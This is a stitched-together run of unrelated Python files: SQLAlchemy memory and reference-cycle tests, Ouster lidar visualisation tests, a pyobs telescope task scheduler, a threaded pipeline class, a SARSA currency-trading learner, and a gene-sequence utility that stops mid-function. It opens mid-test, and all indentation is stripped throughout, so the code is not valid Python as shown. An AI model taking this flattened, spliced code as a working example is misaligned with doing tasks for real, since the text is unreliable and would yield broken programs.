class B(fixtures.ComparableEntity):
pass
mapper(
A,
table1,
properties={
"bs": relationship(
B, secondary=table3, backref="as", order_by=table3.c.t1
)
},
)
mapper(B, table2)
sess = create_session(self.engine)
a1 = A(col2="a1")
a2 = A(col2="a2")
b1 = B(col2="b1")
b2 = B(col2="b2")
a1.bs.append(b1)
a2.bs.append(b2)
for x in [a1, a2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(bs=[B(col2="b1")]), A(bs=[B(col2="b2")])], alist)
for a in alist:
sess.delete(a)
sess.flush()
# mappers necessarily find themselves in the compiled cache,
# so to allow them to be GC'ed clear out the cache
self.engine.clear_compiled_cache()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
@testing.uses_deprecated()
@testing.provide_metadata
def test_key_fallback_result(self):
e = self.engine
m = self.metadata
t = Table("t", m, Column("x", Integer), Column("y", Integer))
m.create_all(e)
e.execute(t.insert(), {"x": 1, "y": 1})
@profile_memory()
def go():
r = e.execute(t.alias().select())
for row in r:
row[t.c.x]
go()
def test_many_discarded_relationships(self):
"""a use case that really isn't supported, nonetheless we can
guard against memleaks here so why not"""
m1 = MetaData()
t1 = Table("t1", m1, Column("id", Integer, primary_key=True))
t2 = Table(
"t2",
m1,
Column("id", Integer, primary_key=True),
Column("t1id", ForeignKey("t1.id")),
)
class T1(object):
pass
t1_mapper = mapper(T1, t1)
@testing.emits_warning()
@profile_memory()
def go():
class T2(object):
pass
t2_mapper = mapper(T2, t2)
t1_mapper.add_property("bar", relationship(t2_mapper))
s1 = fixture_session()
# this causes the path_registry to be invoked
s1.query(t1_mapper)._compile_context()
go()
# fails on newer versions of pysqlite due to unusual memory behavior
# in pysqlite itself. background at:
# http://thread.gmane.org/gmane.comp.python.db.pysqlite.user/2290
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache_deprecated_coercion(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo(object):
pass
class Bar(object):
pass
mapper(
Foo, table1, properties={"bars": relationship(mapper(Bar, table2))}
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = table2.select()
sess = session()
with testing.expect_deprecated(
"Implicit coercion of SELECT and " "textual SELECT constructs"
):
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo(object):
pass
class Bar(object):
pass
mapper(
Foo, table1, properties={"bars": relationship(mapper(Bar, table2))}
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = table2.select().subquery()
sess = session()
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
class CycleTest(_fixtures.FixtureTest):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
run_setup_mappers = "once"
run_inserts = "once"
run_deletes = None
@classmethod
def setup_mappers(cls):
cls._setup_stock_mapping()
def test_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).all()
go()
def test_session_execute_orm(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
stmt = select(User)
s.execute(stmt)
go()
def test_cache_key(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
stmt = select(User)
stmt._generate_cache_key()
go()
def test_proxied_attribute(self):
from sqlalchemy.ext import hybrid
users = self.tables.users
class Foo(object):
@hybrid.hybrid_property
def user_name(self):
return self.name
mapper(Foo, users)
# unfortunately there's a lot of cycles with an aliased()
# for now, however calling upon clause_element does not seem
# to make it worse which is what this was looking to test
@assert_cycles(68)
def go():
a1 = aliased(Foo)
a1.user_name.__clause_element__()
go()
def test_raise_from(self):
@assert_cycles()
def go():
try:
try:
raise KeyError("foo")
except KeyError as ke:
util.raise_(Exception("oops"), from_=ke)
except Exception as err: # noqa
pass
go()
def test_query_alias(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
u1 = aliased(User)
@assert_cycles()
def go():
s.query(u1).all()
go()
def test_entity_path_w_aliased(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)._path_registry[User.addresses.property]
go()
def test_orm_objects_from_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
def generate():
objects = s.query(User).filter(User.id == 7).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_orm_objects_from_query_w_selectinload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(selectinload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_selectinload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
selectinload(User.addresses)
go()
def test_selectinload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
Load(User).selectinload(User.addresses)
go()
def test_orm_path(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
inspect(User)._path_registry[User.addresses.property][
inspect(Address)
]
go()
def test_joinedload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
joinedload(User.addresses)
go()
def test_joinedload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
l1 = Load(User).joinedload(User.addresses)
l1._generate_cache_key()
go()
def test_orm_objects_from_query_w_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(joinedload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_query_filtered(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).filter(User.id == 7).all()
go()
def test_query_joins(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
# cycles here are due to ClauseElement._cloned_set, others
# as of cache key
@assert_cycles(4)
def go():
s.query(User).join(User.addresses).all()
go()
def test_query_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
s.query(User).options(joinedload(User.addresses)).all()
# cycles here are due to ClauseElement._cloned_set and Load.context,
# others as of cache key. The orm.instances() function now calls
# dispose() on both the context and the compiled state to try
# to reduce these cycles.
@assert_cycles(18)
def go():
generate()
go()
def test_plain_join(self):
users, addresses = self.tables("users", "addresses")
@assert_cycles()
def go():
str(users.join(addresses).compile(testing.db))
go()
def test_plain_join_select(self):
users, addresses = self.tables("users", "addresses")
# cycles here are due to ClauseElement._cloned_set, others
# as of cache key
@assert_cycles(7)
def go():
s = select(users).select_from(users.join(addresses))
state = s._compile_state_factory(s, s.compile(testing.db))
state.froms
go()
def test_orm_join(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
str(orm_join(User, Address, User.addresses).compile(testing.db))
go()
def test_join_via_query_relationship(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(User.addresses)
go()
def test_join_via_query_to_entity(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(Address)
go()
def test_result_fetchone(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.connection(mapper=User).execute(stmt)
while True:
row = result.fetchone()
if row is None:
break
go()
def test_result_fetchall(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
rows = result.fetchall() # noqa
go()
def test_result_fetchmany(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.partitions(3):
pass
go()
def test_result_fetchmany_unique(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.unique().partitions(3):
pass
go()
def test_core_select_from_orm_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
# ORM query using future select for .statement is adding
# some ORMJoin cycles here during compilation. not worth trying to
# find it
@assert_cycles(4)
def go():
s.execute(stmt)
go()
def test_adapt_statement_replacement_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
replacement_traverse(statement, {}, lambda x: None)
go()
def test_adapt_statement_cloned_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
cloned_traverse(statement, {}, {})
go()
def test_column_adapter_lookup(self):
User, Address = self.classes("User", "Address")
u1 = aliased(User)
@assert_cycles()
def go():
adapter = sql_util.ColumnAdapter(inspect(u1).selectable)
adapter.columns[User.id]
go()
def test_orm_aliased(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)
go()
@testing.fails()
def test_the_counter(self):
@assert_cycles()
def go():
x = []
x.append(x)
go()
def test_weak_sequence(self):
class Foo(object):
pass
f = Foo()
@assert_cycles()
def go():
util.WeakSequence([f])
go()
@testing.provide_metadata
def test_optimized_get(self):
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base(metadata=self.metadata)
class Employee(Base):
__tablename__ = "employee"
id = Column(
Integer, primary_key=True, test_needs_autoincrement=True
)
type = Column(String(10))
__mapper_args__ = {"polymorphic_on": type}
class Engineer(Employee):
__tablename__ = " engineer"
id = Column(ForeignKey("employee.id"), primary_key=True)
engineer_name = Column(String(50))
__mapper_args__ = {"polymorphic_identity": "engineer"}
Base.metadata.create_all(testing.db)
s = Session(testing.db)
s.add(Engineer(engineer_name="wally"))
s.commit()
s.close()
@assert_cycles()
def go():
e1 = s.query(Employee).first()
e1.engineer_name
go()
def test_visit_binary_product(self):
a, b, q, e, f, j, r = [column(chr_) for chr_ in "abqefjr"]
from sqlalchemy import and_, func
from sqlalchemy.sql.util import visit_binary_product
expr = and_((a + b) == q + func.sum(e + f), j == r)
def visit(expr, left, right):
pass
@assert_cycles()
def go():
visit_binary_product(visit, expr)
go()
def test_session_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.close()
go()
def test_session_commit_rollback(self):
# this is enabled by #5074
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.commit()
go()
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.rollback()
go()
def test_session_multi_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
assert s._transaction is None
s.connection()
s.close()
assert s._transaction is None
s.connection()
assert s._transaction is not None
s.close()
go()
|
test_viz.py
|
"""
Copyright (c) 2021, Ouster, Inc.
All rights reserved.
"""
import weakref
from typing import TYPE_CHECKING, Tuple
import pytest
import numpy as np
import random
from ouster import client
# test env may not have opengl, but all test modules are imported during
# collection. Import is still needed to typecheck
if TYPE_CHECKING:
from ouster.sdk import viz
else:
viz = pytest.importorskip('ouster.sdk.viz')
# mark all tests in this module so they only run with the --interactive flag
pytestmark = pytest.mark.interactive
def make_checker_board(square_size: int, reps:Tuple[int, int]) -> np.ndarray:
img_data = np.full((square_size, square_size), 0)
img_data = np.hstack([img_data, np.logical_xor(img_data, 1)])
img_data = np.vstack([img_data, np.logical_xor(img_data, 1)])
img_data = np.tile(img_data, reps)
return img_data
@pytest.fixture
def point_viz() -> viz.PointViz:
point_viz = viz.PointViz("Test Viz",
fix_aspect=True,
window_width=640,
window_height=480)
weakself = weakref.ref(point_viz)
def handle_keys(ctx, key, mods) -> bool:
self = weakself()
if self is not None and key == 256: # ESC
self.running(False)
return True
point_viz.push_key_handler(handle_keys)
return point_viz
def test_point_viz_image(point_viz: viz.PointViz) -> None:
"""Test displaying a full-window image."""
img = viz.Image()
img.set_position(-4 / 3, 4 / 3, -1, 1)
img.set_image(
np.tile(np.linspace(0.0, 1.0, 640, dtype=np.float32), (480, 1)))
point_viz.add(img)
point_viz.update()
point_viz.run()
def test_point_viz_image_with_labels_aligned(point_viz: viz.PointViz) -> None:
"""Test displaying a set of images aligned to the corners."""
red_rgba = (1.0, 0.3, 0.3, 1)
blue_rgba = (0.3, 0.3, 1.0, 1)
green_rgba = (0.3, 1.0, 0.3, 1)
yellow_rgba = (1.0, 1.0, 0.3, 1)
cyan_rgba = (1.0, 0.3, 1.0, 1)
magenta_rgba = (0.3, 1.0, 1.0, 1)
white_rgba = (1.0, 1.0, 1.0, 1)
gray_rgba = (0.5, 0.5, 0.5, 1)
colors = [red_rgba, blue_rgba, green_rgba, yellow_rgba, cyan_rgba, magenta_rgba, white_rgba,
gray_rgba]
ylen = 0.15
xlen_calc = lambda vlen, shape: shape[1] * vlen / shape[0]
label_posx = lambda posx: (posx + 1) / 2
label_posy = lambda posy: 1 - (posy + 1) / 2
def gen_rand_img():
return make_checker_board(10, (random.randrange(2, 5), random.randrange(2, 5)))
def gen_rand_color():
return random.choice(colors)
def add_image(im_data, xpos, ypos, hshift = 0):
img = viz.Image()
img.set_position(*xpos, *ypos)
img.set_image(im_data)
img.set_hshift(hshift)
point_viz.add(img)
def add_label(text, xpos, ypos, align_right=False, align_top=False, rgba=None, scale=2):
xpos = label_posx(xpos)
ypos = label_posy(ypos)
label = viz.Label(text, xpos, ypos, align_right=align_right, align_top=align_top)
label.set_rgba(rgba if rgba else gen_rand_color())
label.set_scale(scale)
point_viz.add(label)
# center
img_data = gen_rand_img()
xlen = xlen_calc(ylen, img_data.shape)
ypos = [- ylen / 2, ylen / 2] # center
xpos = [- xlen / 2, xlen / 2]
add_image(img_data, xpos, ypos, 0)
add_label("Center", 0, ypos[1])
# top left
img_data = gen_rand_img()
xlen = xlen_calc(ylen, img_data.shape)
ypos = [1 - ylen, 1] # top
xpos = [0, xlen]
add_image(img_data, xpos, ypos, -1.0)
add_label("Top Left - top", -1.0, ypos[1], align_top=True)
add_label("Top Left - bottom", -1.0, ypos[0], align_top=False)
# top right
img_data = gen_rand_img()
xlen = xlen_calc(ylen, img_data.shape)
ypos = [1 - ylen, 1] # top
xpos = [- xlen, 0]
add_image(img_data, xpos, ypos, 1.0)
add_label("Top Right - top", 1.0, ypos[1], align_right=True, align_top=True)
add_label("Top Right - bottom", 1.0, ypos[0], align_right=True, align_top=False)
# bottom left
img_data = gen_rand_img()
xlen = xlen_calc(ylen, img_data.shape)
ypos = [-1, -1 + ylen] # bottom
xpos = [0, xlen]
add_image(img_data, xpos, ypos, -1.0)
add_label("Bottom Left - top", -1.0, ypos[1], align_right=False, align_top=True)
add_label("Bottom Left - bottom", -1.0, ypos[0], align_right=False, align_top=False)
# bottom right
img_data = gen_rand_img()
xlen = xlen_calc(ylen, img_data.shape)
ypos = [-1, -1 + ylen] # bottom
xpos = [-xlen, 0]
add_image(img_data, xpos, ypos, 1.0)
add_label("Bottom Right - top", 1.0, ypos[1], align_right=True, align_top=True)
add_label("Bottom Right - bottom", 1.0, ypos[0], align_right=True, align_top=False)
point_viz.update()
point_viz.run()
def test_point_viz_labels(point_viz: viz.PointViz) -> None:
"""Smoke test rendering labels."""
label1 = viz.Label("Foobar", 0, 0, 1)
label1.set_scale(0.75)
label2 = viz.Label("Baz\nQux", 0, 0, 0)
label3 = viz.Label("Quux", 1, 1, align_right=True)
label3.set_scale(2.5)
point_viz.add(label1)
point_viz.add(label2)
point_viz.add(label3)
point_viz.camera.dolly(250)
point_viz.update()
point_viz.run()
def test_point_viz_cloud_unstructured(point_viz: viz.PointViz) -> None:
"""Smoke test rendering unstructured clouds."""
import math
import threading
import time
cloud = viz.Cloud(1024)
point_viz.add(cloud)
cloud.set_xyz(np.random.rand(1024, 3).astype(np.float32) * 30 - 15)
cloud.set_key(np.random.rand(1024).astype(np.float32))
quit = threading.Event()
def animate() -> None:
ticks = 0
while not quit.is_set():
t = (ticks % 300) / 150.0 * math.pi
pose = np.array(
[
[math.cos(t), math.sin(-t), 0, 0], # rotate about z
[math.sin(t), math.cos(t), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]
],
order='F')
cloud.set_pose(pose)
point_viz.update()
ticks += 1
time.sleep(0.0333)
thread = threading.Thread(target=animate)
thread.start()
point_viz.run()
quit.set()
thread.join()
def test_point_viz_destruction() -> None:
"""Check that PointViz is destroyed deterministically."""
point_viz = viz.PointViz("Test Viz")
ref = weakref.ref(point_viz)
del point_viz
assert ref() is None
@pytest.mark.parametrize('test_key', ['legacy-2.0'])
def test_scan_viz_destruction(meta: client.SensorInfo,
point_viz: viz.PointViz) -> None:
"""Check that LidarScan is destroyed deterministically."""
ls_viz = viz.LidarScanViz(meta, point_viz)
ref = weakref.ref(ls_viz)
del ls_viz
assert ref() is None
@pytest.mark.parametrize('test_key', ['legacy-2.0'])
def test_viz_multiple_instances(meta: client.SensorInfo,
scan: client.LidarScan) -> None:
"""Check that destructing a visualizer doesn't break other instances."""
point_viz = viz.PointViz("Test Viz")
# will call destructor, make sure it doesn't do anything silly like terminate glfw
point_viz2 = viz.PointViz("Test Viz2")
del point_viz2
ls_viz = viz.LidarScanViz(meta, point_viz)
ls_viz.scan = scan
ls_viz.draw()
point_viz.run()
def test_scan_viz_smoke(meta: client.SensorInfo,
scan: client.LidarScan) -> None:
"""Smoke test LidarScan visualization."""
ls_viz = viz.LidarScanViz(meta)
ls_viz.scan = scan
ls_viz.draw()
ls_viz.run()
@pytest.mark.parametrize('test_key', ['legacy-2.0'])
def test_scan_viz_extras(meta: client.SensorInfo,
scan: client.LidarScan) -> None:
"""Check rendering of labels, cuboids, clouds and images together."""
point_viz = viz.PointViz("Test Viz")
ls_viz = viz.LidarScanViz(meta, point_viz)
cube1 = viz.Cuboid(np.identity(4), (1.0, 0, 0))
# scaled in y and translated in x
pose2 = np.array([
[1, 0, 0, 5],
[0, 2, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1],
])
cube2 = viz.Cuboid(pose2, (0, 1, 0, 0.5))
label1 = viz.Label("Baz\nQux", 0.0, 0.0, 2.0)
point_viz.add(label1)
point_viz.add(cube1)
point_viz.add(cube2)
ls_viz.scan = scan
point_viz.camera.dolly(150)
ls_viz.draw()
point_viz.run()
|
mastermind.py
|
import logging
import threading
from typing import Union, List, Dict, Tuple, Any
import astropy.units as u
from pyobs.modules import Module
from pyobs.object import get_object
from pyobs.events.taskfinished import TaskFinishedEvent
from pyobs.events.taskstarted import TaskStartedEvent
from pyobs.interfaces import IFitsHeaderProvider, IAutonomous
from pyobs.robotic.taskarchive import TaskArchive
from pyobs.robotic.task import Task
from pyobs.utils.time import Time
log = logging.getLogger(__name__)
class Mastermind(Module, IAutonomous, IFitsHeaderProvider):
"""Mastermind for a full robotic mode."""
__module__ = 'pyobs.modules.robotic'
def __init__(self, tasks: Union[TaskArchive, dict], allowed_late_start: int = 300, allowed_overrun: int = 300,
*args, **kwargs):
"""Initialize a new auto focus system.
Args:
tasks: Task archive to use
allowed_late_start: Allowed seconds to start late.
allowed_overrun: Allowed time for a task to exceed it's window in seconds
"""
Module.__init__(self, *args, **kwargs)
# store
self._allowed_late_start = allowed_late_start
self._allowed_overrun = allowed_overrun
self._running = False
# add thread func
self.add_thread_func(self._run_thread, True)
# get task archive
self._task_archive: TaskArchive = get_object(tasks, object_class=TaskArchive,
comm=self.comm, vfs=self.vfs, observer=self.observer)
# observation name and exposure number
self._task = None
self._obs = None
self._exp = None
def open(self):
"""Open module."""
Module.open(self)
# subscribe to events
if self.comm:
self.comm.register_event(TaskStartedEvent)
self.comm.register_event(TaskFinishedEvent)
# start
self._running = True
# open scheduler
self._task_archive.open()
def close(self):
"""Close module."""
Module.close(self)
# close scheduler
self._task_archive.close()
def start(self, *args, **kwargs):
"""Starts a service."""
log.info('Starting robotic system...')
self._running = True
def stop(self, *args, **kwargs):
"""Stops a service."""
log.info('Stopping robotic system...')
self._running = False
def is_running(self, *args, **kwargs) -> bool:
"""Whether a service is running."""
return self._running
def _run_thread(self):
# wait a little
self.closing.wait(1)
# flags
first_late_start_warning = True
# run until closed
while not self.closing.is_set():
# not running?
if not self._running:
# sleep a little and continue
self.closing.wait(1)
continue
# get now
now = Time.now()
# find task that we want to run now
task: Task = self._task_archive.get_task(now)
if task is None or not task.can_run():
# no task found
self.closing.wait(10)
continue
# starting too late?
if not task.can_start_late:
late_start = now - task.start
if late_start > self._allowed_late_start * u.second:
# only warn once
if first_late_start_warning:
log.warning('Time since start of window (%.1f) too long (>%.1f), skipping task...',
late_start.to_value('second'), self._allowed_late_start)
first_late_start_warning = False
# sleep a little and skip
self.closing.wait(10)
continue
# reset warning
first_late_start_warning = True
# set it
self._task = task
# ETA
eta = now + self._task.duration * u.second
# send event
self.comm.send_event(TaskStartedEvent(name=self._task.name, id=self._task.id, eta=eta))
# run task in thread
log.info('Running task %s...', self._task.name)
abort_event = threading.Event()
task_thread = threading.Thread(target=self._task_archive.run_task, args=(self._task, abort_event))
task_thread.start()
# wait for it
while True:
# not alive anymore?
if not task_thread.is_alive():
# finished
break
# closing?
if self.closing.is_set() or Time.now() > task.end + self._allowed_overrun * u.second:
# set event and wait for thread
abort_event.set()
task_thread.join()
break
# just sleep a little and wait
self.closing.wait(10)
# send event
self.comm.send_event(TaskFinishedEvent(name=self._task.name, id=self._task.id))
# finish
log.info('Finished task %s.', self._task.name)
self._task = None
def get_fits_headers(self, namespaces: List[str] = None, *args, **kwargs) -> Dict[str, Tuple[Any, str]]:
"""Returns FITS header for the current status of this module.
Args:
namespaces: If given, only return FITS headers for the given namespaces.
Returns:
Dictionary containing FITS headers.
"""
# inside an observation?
if self._task is not None:
hdr = self._task.get_fits_headers()
hdr['TASK'] = self._task.name, 'Name of task'
hdr['REQNUM'] = str(self._task.id), 'Unique ID of task'
return hdr
else:
return {}
__all__ = ['Mastermind']
|
pipeline.py
|
import queue
import threading
from abc import abstractmethod, ABC
from typing import Generator, List
class PipelinePacket:
def __init__(self, label, data):
self.label = label
self.data = data
class PipelineStep(ABC):
def __init__(self, labels: List[str] or None):
self.q_in = None
self.q_out = None
self.t = None
self.labels = labels
def set_q_in(self, q: queue.Queue):
self.q_in = q
def set_q_out(self, q: queue.Queue):
self.q_out = q
def __worker(self):
if self.q_in is None and self.q_out is None:
return
self.setup()
if self.q_in is None:
# We are probably the first step in the pipeline
for i_out in self.process(None):
self.q_out.put(i_out)
else:
# We have a preceding step whose items we need to process
while True:
item: PipelinePacket = self.q_in.get()
if item is None:
break
if self.labels is not None and item.label not in self.labels:
if self.q_out is not None:
self.q_out.put(item)
continue
if self.q_out is None:
# We are probably the last step in the pipeline so we ignore the output
for _ in self.process(item):
pass
else:
# We have a succeeding step to which we need to push the items
for i_out in self.process(item):
self.q_out.put(i_out)
self.q_in.task_done()
if self.q_out is not None:
self.q_out.put(None)
self.cleanup()
def start(self):
self.t = threading.Thread(target=self.__worker, daemon=True)
self.t.start()
def join(self):
self.t.join()
@abstractmethod
def setup(self):
pass
@abstractmethod
def cleanup(self):
pass
@abstractmethod
def process(self, item: PipelinePacket) -> Generator[PipelinePacket, None, None]:
return
yield
class Pipeline:
def __init__(self):
self.steps = []
def add_step(self, step):
self.steps.append(step)
def compile(self):
q = None
for s in self.steps[:-1]:
s.set_q_in(q)
q = queue.Queue()
s.set_q_out(q)
self.steps[-1].set_q_in(q)
def start(self):
for s in self.steps:
s.start()
def join(self):
for s in self.steps:
s.join()
|
algo04_sarsa.py
|
import os
import pickle
import argparse
import threading
import click
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import animation
from notebooks.helpers import hldit
from notebooks.algo.agent import PolicyBasedTrader
from notebooks.algo.environment import Environment
from notebooks.cardrive.visualize import build_evaluation_chart
def extract_policy(agent, Q):
s_S = agent.states_space_size
policy = np.full(s_S, -1)
for state in range(s_S):
# valid actions in a given state
actions = agent.get_available_actions(state)
for a in np.flip(np.argsort(Q[state])): # from best to worst
if a in actions:
policy[state] = a
break
return policy
def get_next_action(agent, Q, state, eps=1.0) -> int:
"""
desc.
"""
actions = agent.get_available_actions(state)
if np.random.random() < eps:
return np.random.choice(actions)
else:
policy = extract_policy(agent, Q)
return int(policy[state])
def evaluate_q(env, Q):
agent = PolicyBasedTrader(policy=None, env=env)
policy = extract_policy(agent, Q)
for step in range(env.size):
state = agent.to_state(step, agent.amount_usd)
action = policy[state]
agent.take_action(action, state)
return agent.profit
DUMP_FILENAME = 'sarsa_q.model'
class SarsaModel(object):
def __init__(self, Q, eps):
self.Q = Q
self.eps = eps
def save(self):
print('\nSaving model to a file {}'.format(DUMP_FILENAME))
with open(DUMP_FILENAME, 'wb') as f:
pickle.dump(self, f)
@staticmethod
def load():
if os.path.exists(DUMP_FILENAME):
print('Loading model from {}'.format(DUMP_FILENAME))
with open(DUMP_FILENAME, 'rb') as f:
return pickle.load(f)
def evaluate_agent():
env = Environment()
env.load(2018)
agent = PolicyBasedTrader(policy=None, env=env)
model = SarsaModel.load()
if model is None:
raise RuntimeError('Train agent first, no model to load')
policy = extract_policy(agent, model.Q)
print('Evaluate SARSA model on env with size: {}'.format(env.size))
for step in range(env.size):
state = agent.to_state(step, agent.amount_usd)
action = policy[state]
agent.take_action(action, state)
print('End amount UAH: {:.2f}'.format(agent.amount_uah))
print('End amount USD: {:.2f}'.format(agent.amount_usd))
print('Profit in UAH: {:.2f}'.format(agent.profit))
exit_uah = agent.amount_usd * env.get_observation(env.size-1).rate_buy
exit_amount = agent.amount_uah + exit_uah
print('Amount on exit now: {:.2f}'.format(exit_amount))
return agent.profit
@hldit
def sarsa(play=False, plot_chart=False):
env = Environment()
# load smaller environment for just one month
env.load(2018)
agent = PolicyBasedTrader(policy=None, env=env)
s_S = agent.states_space_size
s_A = agent.actions_space_size
print(f'States space size is {s_S}')
print(f'Actions space size is {s_A}')
print(f'Steps in environment is {env.size}')
alpha = 1 # learning rate, discard old results immediately
gamma = 1 # discount factor
# load model from a file if saved previously
model = SarsaModel.load() if play else None
Q = model.Q if model is not None else np.zeros(shape=(s_S, s_A))
if model is not None:
print(f'Resuming with eps={model.eps}')
min_eps = 0.01
eps = 0.1 # start with exploration
eps = model.eps if model is not None else 0.1
max_eps = 1.0
decay_rate = 0.05
best_fitness = -np.inf
EPOCHS = 2000
period = 5
data = []
fig, ax = plt.subplots(figsize=(6, 4))
fig.canvas.set_window_title('Agent evaluation')
def build_live_chart(i):
window = 20 # show N last values
local_data = data[-window:]
sv = (len(data) - window)*period if len(data) - window > 0 else 0
ev = len(data)*period
datax = np.arange(sv, ev, period)
plt.xlabel('Iterations')
plt.ylabel('Fitness')
plt.title('Learning curve')
ax.clear()
ax.plot(datax, local_data, 'b', label='Score')
ax.legend()
ax.grid(True)
def run_iterations():
nonlocal eps, best_fitness
print(f'Running {EPOCHS} epochs\n')
for i in range(EPOCHS):
if i % period == 0:
print(f'Evaluating agent on {i} iteration...')
fitness = evaluate_q(env, Q)
if fitness > 0:
click.secho(f'We have positive fitness {fitness:.2f}',
fg='red')
if fitness > best_fitness:
best_fitness = fitness
data.append(fitness)
# reset env for each epoch
agent = PolicyBasedTrader(policy=None, env=env)
s = 0 # starting state
a = get_next_action(agent, Q, s, eps=eps)
print(f'Rollout for epoch {i}')
while s is not None: # rollout
r, s_ = agent.take_action(a, s)
if s_ is not None:
a_ = get_next_action(agent, Q, s_, eps=eps)
q_update = alpha * (r + gamma*Q[s_, a_] - Q[s, a])
else:
q_update = alpha * (r - Q[s, a])
a_ = None
Q[s, a] += q_update
s = s_
a = a_
eps = min_eps + (max_eps - min_eps)*np.exp(-decay_rate*i)
ani = animation.FuncAnimation(fig, build_live_chart, interval=500)
t = threading.Thread(target=run_iterations)
t.start()
plt.show()
t.join()
# Save latest data
if not play:
model = SarsaModel(Q=Q, eps=eps)
model.save()
print('\nDone!')
click.secho(f'Best fitness {best_fitness:.2f}', fg='green')
policy = extract_policy(agent, Q)
if plot_chart:
build_evaluation_chart(data, period=period)
return policy
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--play',
action='store_true',
default=False,
help='use saved model just to evaluate an agent',
)
parser.add_argument(
'--chart',
action='store_true',
default=True,
help='build full evaluation chart in the end',
)
return parser.parse_args()
def main():
args = parse_args()
sarsa(play=args.play, plot_chart=args.chart)
evaluate_agent()
if __name__ == '__main__':
main()
|
util.py
|
import math
import os, pickle
import random
import copy
import time
import numpy as np
import settings
from warnings import warn
def get_pairwise_distance_mudra(r):
pair_dis = np.abs(r - r[:, None])
pair_dis = np.reshape(pair_dis,len(r)*len(r))
pair_dis.sort()
pair_dis = pair_dis[len(r):]
return np.mean(pair_dis)
def get_gene_sequence(gene_name):
try:
gene_file = settings.seq_dir_template.format(gene_name=gene_name)
with open(gene_file, 'rb') as f:
seq = f.read()
seq = seq.replace('\r', '')
seq = seq.replace('\n', '')
except:
